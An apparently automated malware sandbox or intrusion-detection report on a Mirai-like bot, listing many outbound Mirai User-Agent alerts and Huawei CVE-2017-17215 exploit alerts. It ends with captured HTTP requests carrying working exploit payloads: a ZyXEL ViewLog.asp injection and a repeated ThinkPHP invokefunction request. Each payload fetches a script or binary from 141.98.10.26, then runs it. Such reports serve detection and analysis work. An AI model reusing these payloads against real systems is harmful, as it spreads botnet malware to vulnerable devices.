Classtype:	A Network Trojan was detected

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.127.81.120

Timestamp:	192.168.2.23112.127.81.12059622802839471 11/22/23-08:38:57.132798
SID:	2839471
Source Port:	59622
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.119.185.32

Timestamp:	192.168.2.2388.119.185.3235072802839471 11/22/23-08:38:13.799641
SID:	2839471
Source Port:	35072
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.78.159.12

Timestamp:	192.168.2.23112.78.159.1259346802839471 11/22/23-08:39:04.423434
SID:	2839471
Source Port:	59346
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.221.192.48

Timestamp:	192.168.2.2388.221.192.4853838802839471 11/22/23-08:38:13.781061
SID:	2839471
Source Port:	53838
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.48.136.107

Timestamp:	192.168.2.23112.48.136.10747026802839471 11/22/23-08:38:49.077903
SID:	2839471
Source Port:	47026
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.126.144.207

Timestamp:	192.168.2.23112.126.144.20755552802839471 11/22/23-08:39:16.547473
SID:	2839471
Source Port:	55552
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.101.174.12

Timestamp:	192.168.2.2395.101.174.1233636802839471 11/22/23-08:38:58.053804
SID:	2839471
Source Port:	33636
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.86.66.99

Timestamp:	192.168.2.2395.86.66.9933380802839471 11/22/23-08:39:14.001801
SID:	2839471
Source Port:	33380
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.3.25.43

Timestamp:	192.168.2.23112.3.25.4340570802839471 11/22/23-08:39:35.000147
SID:	2839471
Source Port:	40570
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.82.174.233

Timestamp:	192.168.2.2395.82.174.23351634802839471 11/22/23-08:38:24.758640
SID:	2839471
Source Port:	51634
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.12.26.234

Timestamp:	192.168.2.23112.12.26.23455232802839471 11/22/23-08:38:49.093468
SID:	2839471
Source Port:	55232
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) - Source IP: 192.168.2.23 - Destination IP: 197.224.204.222

Timestamp:	192.168.2.23197.224.204.22249476372152829579 11/22/23-08:39:47.427391
SID:	2829579
Source Port:	49476
Destination Port:	37215
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.197.130.136

Timestamp:	192.168.2.23112.197.130.13655720802839471 11/22/23-08:39:52.524365
SID:	2839471
Source Port:	55720
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.221.179.197

Timestamp:	192.168.2.2388.221.179.19742598802839471 11/22/23-08:39:26.891755
SID:	2839471
Source Port:	42598
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.163.97.122

Timestamp:	192.168.2.2395.163.97.12240104802839471 11/22/23-08:40:09.783813
SID:	2839471
Source Port:	40104
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.126.102.82

Timestamp:	192.168.2.23112.126.102.8245362802839471 11/22/23-08:39:17.126730
SID:	2839471
Source Port:	45362
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.58.65.29

Timestamp:	192.168.2.2395.58.65.2933066802839471 11/22/23-08:39:41.213175
SID:	2839471
Source Port:	33066
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.78.213.52

Timestamp:	192.168.2.23112.78.213.5255400802839471 11/22/23-08:39:05.071025
SID:	2839471
Source Port:	55400
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) - Source IP: 192.168.2.23 - Destination IP: 41.42.152.140

Timestamp:	192.168.2.2341.42.152.14033446372152835222 11/22/23-08:40:09.100084
SID:	2835222
Source Port:	33446
Destination Port:	37215
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.173.239.86

Timestamp:	192.168.2.23112.173.239.8647950802839471 11/22/23-08:38:13.596999
SID:	2839471
Source Port:	47950
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.101.142.64

Timestamp:	192.168.2.2395.101.142.6434180802839471 11/22/23-08:40:24.286995
SID:	2839471
Source Port:	34180
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.173.100.220

Timestamp:	192.168.2.23112.173.100.22039768802839471 11/22/23-08:38:11.976232
SID:	2839471
Source Port:	39768
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.216.87.24

Timestamp:	192.168.2.2395.216.87.2457626802839471 11/22/23-08:38:42.834418
SID:	2839471
Source Port:	57626
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.163.137.60

Timestamp:	192.168.2.2395.163.137.6051394802839471 11/22/23-08:38:19.619645
SID:	2839471
Source Port:	51394
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.101.50.118

Timestamp:	192.168.2.2395.101.50.11847172802839471 11/22/23-08:40:24.376457
SID:	2839471
Source Port:	47172
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.221.158.2

Timestamp:	192.168.2.2388.221.158.248184802839471 11/22/23-08:39:14.652864
SID:	2839471
Source Port:	48184
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.141.86.58

Timestamp:	192.168.2.2395.141.86.5835004802839471 11/22/23-08:40:04.684838
SID:	2839471
Source Port:	35004
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.86.221.53

Timestamp:	192.168.2.2388.86.221.5353120802839471 11/22/23-08:38:53.509332
SID:	2839471
Source Port:	53120
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.181.164.12

Timestamp:	192.168.2.2395.181.164.1233694802839471 11/22/23-08:39:54.949711
SID:	2839471
Source Port:	33694
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.140.17.11

Timestamp:	192.168.2.2395.140.17.1141194802839471 11/22/23-08:40:04.877720
SID:	2839471
Source Port:	41194
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.221.43.243

Timestamp:	192.168.2.2388.221.43.24338734802839471 11/22/23-08:40:15.862489
SID:	2839471
Source Port:	38734
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.101.214.81

Timestamp:	192.168.2.2395.101.214.8148812802839471 11/22/23-08:40:24.287063
SID:	2839471
Source Port:	48812
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.216.6.100

Timestamp:	192.168.2.2395.216.6.10043372802839471 11/22/23-08:38:07.240461
SID:	2839471
Source Port:	43372
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.100.203.72

Timestamp:	192.168.2.2395.100.203.7242810802839471 11/22/23-08:38:58.051198
SID:	2839471
Source Port:	42810
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.164.199.116

Timestamp:	192.168.2.2395.164.199.11632998802839471 11/22/23-08:39:36.508410
SID:	2839471
Source Port:	32998
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.15.4.125

Timestamp:	192.168.2.23112.15.4.12547648802839471 11/22/23-08:40:31.031584
SID:	2839471
Source Port:	47648
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.126.146.172

Timestamp:	192.168.2.23112.126.146.17256748802839471 11/22/23-08:39:53.158273
SID:	2839471
Source Port:	56748
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.172.161.120

Timestamp:	192.168.2.23112.172.161.12044902802839471 11/22/23-08:38:22.203059
SID:	2839471
Source Port:	44902
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.209.202.197

Timestamp:	192.168.2.2388.209.202.19755212802839471 11/22/23-08:39:29.996788
SID:	2839471
Source Port:	55212
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.125.131.70

Timestamp:	192.168.2.2395.125.131.7045292802839471 11/22/23-08:39:26.308919
SID:	2839471
Source Port:	45292
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.125.209.44

Timestamp:	192.168.2.23112.125.209.4447382802839471 11/22/23-08:38:20.068877
SID:	2839471
Source Port:	47382
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.176.167.180

Timestamp:	192.168.2.2388.176.167.18039584802839471 11/22/23-08:40:18.735553
SID:	2839471
Source Port:	39584
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.179.196.33

Timestamp:	192.168.2.2395.179.196.3359306802839471 11/22/23-08:38:26.756152
SID:	2839471
Source Port:	59306
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.101.4.30

Timestamp:	192.168.2.2395.101.4.3040656802839471 11/22/23-08:39:59.800564
SID:	2839471
Source Port:	40656
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.240.57.224

Timestamp:	192.168.2.23112.240.57.22460138802839471 11/22/23-08:40:14.009559
SID:	2839471
Source Port:	60138
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.101.4.190

Timestamp:	192.168.2.2395.101.4.19046334802839471 11/22/23-08:40:26.986183
SID:	2839471
Source Port:	46334
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.183.8.43

Timestamp:	192.168.2.2395.183.8.4341666802839471 11/22/23-08:39:14.126023
SID:	2839471
Source Port:	41666
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.126.158.127

Timestamp:	192.168.2.23112.126.158.12758440802839471 11/22/23-08:39:33.292304
SID:	2839471
Source Port:	58440
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.126.155.54

Timestamp:	192.168.2.23112.126.155.5447422802839471 11/22/23-08:38:12.005044
SID:	2839471
Source Port:	47422
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.0.177.102

Timestamp:	192.168.2.2395.0.177.10239530802839471 11/22/23-08:38:45.389535
SID:	2839471
Source Port:	39530
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.126.169.213

Timestamp:	192.168.2.23112.126.169.21338134802839471 11/22/23-08:39:52.840268
SID:	2839471
Source Port:	38134
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.5.23.242

Timestamp:	192.168.2.2388.5.23.24255316802839471 11/22/23-08:39:23.775567
SID:	2839471
Source Port:	55316
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.65.217.62

Timestamp:	192.168.2.23112.65.217.6251294802839471 11/22/23-08:38:49.044123
SID:	2839471
Source Port:	51294
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.126.254.14

Timestamp:	192.168.2.23112.126.254.1433902802839471 11/22/23-08:39:59.512208
SID:	2839471
Source Port:	33902
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.111.195.113

Timestamp:	192.168.2.2395.111.195.11333652802839471 11/22/23-08:40:24.427413
SID:	2839471
Source Port:	33652
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.221.129.187

Timestamp:	192.168.2.2388.221.129.18754376802839471 11/22/23-08:40:30.808640
SID:	2839471
Source Port:	54376
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.121.27.76

Timestamp:	192.168.2.23112.121.27.7649532802839471 11/22/23-08:39:08.808872
SID:	2839471
Source Port:	49532
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.161.34.131

Timestamp:	192.168.2.23112.161.34.13146694802839471 11/22/23-08:39:12.394616
SID:	2839471
Source Port:	46694
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.221.202.173

Timestamp:	192.168.2.2388.221.202.17333148802839471 11/22/23-08:40:01.772779
SID:	2839471
Source Port:	33148
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.125.166.91

Timestamp:	192.168.2.23112.125.166.9158408802839471 11/22/23-08:37:59.866051
SID:	2839471
Source Port:	58408
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.100.238.21

Timestamp:	192.168.2.2395.100.238.2148818802839471 11/22/23-08:38:42.555443
SID:	2839471
Source Port:	48818
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.100.139.78

Timestamp:	192.168.2.2395.100.139.7858014802839471 11/22/23-08:38:24.988517
SID:	2839471
Source Port:	58014
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.216.139.143

Timestamp:	192.168.2.2395.216.139.14342466802839471 11/22/23-08:38:53.104292
SID:	2839471
Source Port:	42466
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.125.187.162

Timestamp:	192.168.2.23112.125.187.16253566802839471 11/22/23-08:40:26.532504
SID:	2839471
Source Port:	53566
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

HTTP traffic detected: POST /cgi-bin/ViewLog.asp HTTP/1.1Host: 192.168.0.14:80Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: python-requests/2.20.0Content-Length: 227Content-Type: application/x-www-form-urlencodedData Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
